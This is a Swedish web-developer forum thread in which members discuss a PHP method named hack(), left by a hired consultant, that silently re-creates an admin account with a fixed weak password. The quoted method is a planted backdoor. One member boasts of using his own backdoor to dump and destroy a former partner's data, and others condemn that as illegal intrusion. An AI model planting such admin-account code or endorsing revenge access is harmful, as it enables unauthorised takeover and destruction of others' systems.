Kom ihåg mig?
Home Menu

Menu


Hur skulle ni reagera om en konsult gjorde en sån här kod?

 
Ämnesverktyg Visningsalternativ
Oläst 2013-04-22, 17:07 #11
BarateaUs avatar
BarateaU BarateaU är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Nov 2007
Inlägg: 2 648
BarateaU BarateaU är inte uppkopplad
Klarade millennium-buggen
BarateaUs avatar
 
Reg.datum: Nov 2007
Inlägg: 2 648
Fråga snarare vad avsikten var. Om det är att generiskt testa någon funktion och sedan återsälla konto/lösen eller vad anledningn till denna kod är. Antar att den inte skall vara med i slutprodukten.
Förstår att du ryggar undan när du ser det, benämningen på frågan är oroande också. Ifall det handlar om att lämna bakdörrar för att utnyttja senare.

Senast redigerad av BarateaU den 2013-04-22 klockan 17:11
BarateaU är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 18:15 #12
daniel_s avatar
daniel_ daniel_ är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Apr 2006
Inlägg: 1 603
daniel_ daniel_ är inte uppkopplad
Bara ett inlägg till!
daniel_s avatar
 
Reg.datum: Apr 2006
Inlägg: 1 603
Inte helt ovanligt att utvecklare lämnar bakdörrar för att skydda sig från om uppdragsgivaren inte skulle betala. Jag anser inte att det är rätt men jag vet att det förekommer, har dock inte varit med om det själv. Vill minnas att det var någon på WN för några år sedan som gjorde något liknande, just för att försäkra sig om betalning efter avslutat projekt.
daniel_ är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 18:18 #13
yakuzaemmes avatar
yakuzaemme yakuzaemme är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jun 2012
Inlägg: 773
yakuzaemme yakuzaemme är inte uppkopplad
Mycket flitig postare
yakuzaemmes avatar
 
Reg.datum: Jun 2012
Inlägg: 773
Citat:
Ursprungligen postat av daniel_ Visa inlägg
Inte helt ovanligt att utvecklare lämnar bakdörrar för att skydda sig från om uppdragsgivaren inte skulle betala. Jag anser inte att det är rätt men jag vet att det förekommer, har dock inte varit med om det själv. Vill minnas att det var någon på WN för några år sedan som gjorde något liknande, just för att försäkra sig om betalning efter avslutat projekt.
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
yakuzaemme är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 18:22 #14
Linuus Linuus är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jan 2009
Inlägg: 890
Linuus Linuus är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jan 2009
Inlägg: 890
Citat:
Ursprungligen postat av yakuzaemme Visa inlägg
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
Kanske lämpligare att skriva ett avtal istället
Linuus är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 18:23 #15
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
Är nog både rätt och fel.
Tycker nog det borde vara bättre att skriva ett bra avtal mellan parter.
xciso är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 18:26 #16
daniel_s avatar
daniel_ daniel_ är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Apr 2006
Inlägg: 1 603
daniel_ daniel_ är inte uppkopplad
Bara ett inlägg till!
daniel_s avatar
 
Reg.datum: Apr 2006
Inlägg: 1 603
Citat:
Ursprungligen postat av yakuzaemme Visa inlägg
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
Se där ja!

Därför är det viktigt med både avtal och allmänt förtroende mellan parterna. Jag tror tyvärr du hade kunnat åka på dataintrång eller liknande även om det var fel det dina vänner gjorde.
daniel_ är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 18:45 #17
yakuzaemmes avatar
yakuzaemme yakuzaemme är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jun 2012
Inlägg: 773
yakuzaemme yakuzaemme är inte uppkopplad
Mycket flitig postare
yakuzaemmes avatar
 
Reg.datum: Jun 2012
Inlägg: 773
Citat:
Ursprungligen postat av Linuus Visa inlägg
Kanske lämpligare att skriva ett avtal istället
Givetvis, men ung och dum, trodde dessutom inte det skulle bli så stort som det faktiskt blev.
yakuzaemme är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 21:09 #18
MRDJs avatar
MRDJ MRDJ är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Mar 2006
Inlägg: 1 667
MRDJ MRDJ är inte uppkopplad
Bara ett inlägg till!
MRDJs avatar
 
Reg.datum: Mar 2006
Inlägg: 1 667
Citat:
Ursprungligen postat av xciso Visa inlägg
Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:
	public function hack() {
		$this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
		$this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
	}
Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..
härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

Senast redigerad av MRDJ den 2013-04-22 klockan 21:11
MRDJ är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 22:32 #19
Conny Westh Conny Westh är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Aug 2005
Inlägg: 5 166
Conny Westh Conny Westh är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Aug 2005
Inlägg: 5 166
Citat:
Ursprungligen postat av xciso Visa inlägg
Då är vi 2
Dock lite tråkigt när jag tycker han verkat reko, och är billig.
Han är från Tjeckien, vilket kanske inte gör saken bättre.. Dock är priset på $20/h bra
Här passar ett gammalt känt ordstäv in:

Citat:
Man får vad man betalar för.
Conny Westh är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 22:38 #20
Conny Westh Conny Westh är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Aug 2005
Inlägg: 5 166
Conny Westh Conny Westh är inte uppkopplad
Klarade millennium-buggen
 
Reg.datum: Aug 2005
Inlägg: 5 166
Citat:
Ursprungligen postat av yakuzaemme Visa inlägg
Jag lämnade en bakdörr för något år sedan till mitt eget projekt jag hade med en "vän". När pengarna började rulla in så tog han koden och bröt vänskapen, och körde på utan mig. Väntande tills de hade som mest trafik och gick in genom bakdörren och dumpade allting, databaser, uppladdat content, förstörde filer m.m. På så sätt kan det vara bra att ha bakdörrar när man inte är helt säker, dock bör man sitta väldigt länge och tänka igenom så ingen annan kan använda sig utav det.
Det du gör är olagligt dataintrång. Det din motpart gör är bara en vanlig tvist om betalning. Det är bättre att hålla på koden tills dn motpart har betalt än att själv begå olagligheter. Skriv ett ordentligt avtal som ger dig rätten till ett fett vite om motparten använder koden utan att betala fullt ut i stället.

Du riskerar fängelse medan motparten bara riskerar lite pengar och en vänskap som den andre tydligen inte värderade särskilt högt.

Själv skulle jag aldrig gå in och förstöra filer för en kund oavsett hur stor tvist det gäller. Möjligen kan jag tänka mig att ha en tidsbestämd körtid innan applikationen slutar att fungera. Men det är en normal funktion som man har i vissa applikationer. Det funkar om man inte ger kunden tillgång till källkoden förrän de betalt för den.

Senast redigerad av Conny Westh den 2013-04-22 klockan 22:41
Conny Westh är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 06:12.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017